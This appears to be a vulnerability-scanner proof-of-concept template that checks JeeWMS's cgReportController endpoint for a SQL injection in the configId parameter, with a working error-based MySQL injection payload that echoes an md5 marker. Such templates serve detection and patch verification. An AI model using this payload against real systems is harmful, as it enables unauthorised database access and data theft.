name: poc-yaml-jeewms-cgreportcontroller-configid-sqli
binding: 156a5013-6ded-4d55-adf5-3b8ae6842b14
manual: true
detail:
    author: junfei.song@chaitin.com
    links:
        - https://www.cnvd.org.cn/flaw/show/CNVD-2021-57222
    vulnerability:
        id: CT-529766
        level: high
transport: http
set:
    r1: randomInt(800000000, 1000000000)
rules:
    r0:
        request:
            cache: true
            method: POST
            path: ^/jeewms/cgReportController.do?datagrid&configId=wm_tuopan'%20AND%20GTID_SUBSET(CONCAT(0x7170786271,(MID((IFNULL(CAST(md5({{r1}})%20AS%20NCHAR),0x20)),1,190)),0x7170707671),9571)--%20eEsY
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: page=1&rows=10
        expression: response.body.bcontains(bytes(md5(string(r1))))
expression: r0()
